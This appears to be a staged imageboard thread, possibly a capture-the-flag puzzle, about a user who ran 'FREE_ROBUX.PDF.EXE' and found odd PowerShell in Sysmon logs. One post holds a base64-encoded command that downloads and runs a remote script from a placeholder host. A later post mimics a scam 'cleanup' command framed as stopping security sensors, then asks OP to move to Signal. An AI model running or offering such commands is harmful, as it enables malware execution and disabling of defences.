/g/ - Technology

Name
Email
Subject
Comment
File
Password(For file deletion.)

File: 1765160058951.jpeg(104.8 KB, 1436x522, YVGFx9E.jpeg)

 No.2

I was just scrolling through my sysmon events (to relax) and saw this weird powershell in an event id 1. Am I cooked? Will post in thread…

 No.3

>>2
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdABoAGkAcwBfAGkAcwBfAGEAXwBkAGkAcwB0AHIAYQBjAHQAaQBvAG4ALgBjAHQAZgAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAnACkA

 No.4

>>2

For context - this happened after i downloaded "FREE_ROBUX.PDF.EXE"

 No.5

>>4

.pdf.exe ????? You ran this????

 No.6

File: 1765160568454.png(6.55 KB, 225x225, images.png)

.pdf.exe

 No.7

File: 1765160947672.png(15.09 KB, 434x542, guy_1.png)

homies data was stolen by a guy that looks like this

 No.8

File: 1765160978450.png(23.61 KB, 602x646, guy_2.png)

no he looked like this fr

 No.9

ur whole life about to be in a stealer log on the darkweb my friend

 No.10

File: 1765161129942.jpg(52.41 KB, 1200x628, 480a0ef08d2fc0188b4d04c7a3….jpg)

>>9

too bad u dont have flare, you would know right away!

 No.12

ill help you clean it up OP - open powershell and run this:

powershell -NoP -W Hidden -C "
$avNames = 'defender','crowdstrike','sentinel','carbonblack','edrsvc';
$avNames | ForEach-Object { Write-Host ('[+] Found process: ' + $_) };
Write-Host '[*] Stopping noisy sensors…';
Write-Host '[*] Downloading cleanup tool from https://secure-update-checker.plsrun-test.ctf/stealer-cleanup.exe';
Write-Host '[+] Done. If this printed, everything totally worked :)'
"

 No.13

>>12
i ran it, it didnt do anything :(

 No.14

>>13

oh sorry, typo! HMU on signal, ill send you the real thing +1-555-012-37-42-24

 No.15

File: 1765162349381.jpg(24.63 KB, 524x255, FgmML7sVsAEV1hQ.jpg)

op please do not message that guy


[Return][Go to top] Catalog [Post a Reply]
Delete Post [ ]